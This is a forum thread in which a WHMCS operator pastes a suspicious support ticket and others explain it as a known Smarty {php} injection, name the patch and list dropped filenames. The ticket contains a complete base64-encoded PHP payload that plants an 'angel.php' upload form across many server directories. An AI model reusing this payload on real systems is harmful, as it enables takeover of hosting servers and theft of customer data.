strange tickets (hack attempts?)

[naushad]

Hi all,
I receive support and sales tickets through my whmcs usually. I have the latest version of WHMCS. from few days, i am receiving strange tickets. I am copying them here now. Want to know what does it exactly mean and of course what should I do to avoid them?

gggg
ggggggggggggggggggg@hotmail.com

15/01/2012 06:16 {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigiYW5nZWwucGhwI iwidyIpOw0KZndyaXRlKCRmbywkY29kZSk7DQokYXI9ZXhwbG9 kZSgiXG4iLCJhZG1pbg0KYXR0YWNobWVudHMNCmRvd25sb2Fkc w0KaW1hZ2VzDQppbmNsdWRlcw0KbGFuZw0KbW9kdWxlcw0Kb3J kZXINCnBpcGUNCnN0YXR1cw0KdGVtcGxhdGVzDQp0ZW1wbGF0Z XNfYw0Kd2lkZ2V0cw0KIik7DQoNCmZvcmVhY2goJGFyIGFzICR rZXkgPT4gJHZhbCkNCnsNCiRmbyA9IGZvcGVuKHRyaW0oJHZhb CkuIi9hbmdlbC5waHAiLCJ3Iik7IGZ3cml0ZSgkZm8sJGNvZGU pOw0KfQ=='));{/php}

----------------------------
IP Address: 178.80.183.1

[striddy]

Quote:

Originally Posted by naushad

Hi all,
I receive support and sales tickets through my whmcs usually. I have the latest version of WHMCS. from few days, i am receiving strange tickets. I am copying them here now. Want to know what does it exactly mean and of course what should I do to avoid them?

Please don't post the exploit code. By posting the code, you are making this exploit available to other skiddies to use.

Please edit your post and remove the exploit code.

This exploit has been discussed for months at the whmcs forum. There is much information available at forum.whmcs.com on this topic. I suggest you visit that forum.

If you applied the patch that was made available some months back prior to these hack attempts, you are ok. If you didn't apply it, you have likely been hacked. See forum.whmcs.com for details.

[eLIANT]

Quote:

Originally Posted by freeman

OK. I removed...

Striddy was talking to the original poster.

[freeman]

Quote:

Originally Posted by eLIANT

Striddy was talking to the original poster.

Thanks I didn't see it. I just wanted to show others what the file contains.

Regards,
George B.

[striddy]

Quote:

Originally Posted by freeman

Thanks I didn't see it. I just wanted to show others what the file contains.

Regards,
George B.

George, I understand you are just trying to be helpful.

Showing exploit code to complete strangers, is unfortunately a bad idea. You are essentially giving someone the knowledge of how to hack.... possibly thousands of sites. It is perhaps better to describe what an exploit can do in general terms instead of publicly showing how to do it.

[freeman]

Quote:

Originally Posted by striddy

George, I understand you are just trying to be helpful.

Showing exploit code to complete strangers, is unfortunately a bad idea. You are essentially giving someone the knowledge of how to hack.... possibly thousands of sites. It is perhaps better to describe what an exploit can do in general terms instead of publicly showing how to do it.

This is an old way to hack, using PHP base64 or PHP shell. I am sure Hostgator they have control over this, to block all those exploits.

When you are on dedicated services (like dedicated server) you are on your own. You have to take control of whatever is uploaded to server. If you are doing paid wehhosting, the problems are not so many, maybe with some outdated software (WordPress, Joomla etc), and you have to force the user to update their software installed. But when you are doing free webhosting it is another thing, more complicated and more problems (if you don't have control). If you don't pay attention to your server logs, what users are doing etc, soon your server IP will be blacklisted and almost major web hosting will block emails from any blacklisted IP.

I can talk about this for hours because I did free webhosting and I have seen a lot of things.

One small example is a PHP script hidden in a image file. So the abuser is uploading the image file (jpg, png etc) and you'll say there is no problem, and inside this image is in fact hidden a phpshell and can be a short way to server overload, or worst hack.

So, what I'll suggest is never trust a user (if his email is coming from a free provider, his info is sounds fake) and the most important thing check your logs. I am talking here about dedicated services.

Another thing, In my opinion there is not a real interest to stop abusers, big companies are doing nice money from server setup, anti-spam configurations etc.


Regards,
George B.

[striddy]

Quote:

Originally Posted by freeman

This is an old way to hack, using PHP base64 or PHP shell. I am sure Hostgator they have control over this, to block all those exploits.

George, this is a current hack for WHMCS , which has caused problems for many sites. It is not an old hack.

[freeman]

Quote:

Originally Posted by striddy

George, this is a current hack for WHMCS , which has caused problems for many sites. It is not an old hack.

Just search on Google: "php base64 exploit" and you'll see that this is an old exploit. One example is here: http://forums.oscommerce.com/topic/3...base64-decode/

If you configure your mod_sec to block this is not a problem.

Regards,
George B.

[zomex]

Hello,

This code is an exploit of which WHMCS made a patch for over a month ago. If you've installed the patch you'll be safe but it won't stop people trying it.

This exploit was specific to Smarty which is the template system WHMCS is built with. It also effected a close competitior Hostbillapp.com.

I've helped a lot of people who've been hacked as a result of this. If you're unsure whether you've been hacked or not, common files that I've seen uploaded by the hackers use names such as

red.php
0.php
indexx.php

If you do find out that you've been hacked there is a good post on the WHMCS forums that explains what to do.

Jack

[zomex]

Quote:

Originally Posted by freeman

Just search on Google: "php base64 exploit" and you'll see that this is an old exploit. One example is here: http://forums.oscommerce.com/topic/3...base64-decode/

If you configure your mod_sec to block this is not a problem.

Regards,
George B.

I second striddy on this. I don't think this is the same in anyway other than the hackers using PHP Eval to encode their PHP.

The hack is a result of WHMCS previously allowing PHP to be executed in support tickets using {php} {/php}

A lot of people from a mix of hosting companies have been hacked which could have been avoided by simply installing WHMCS's security patch.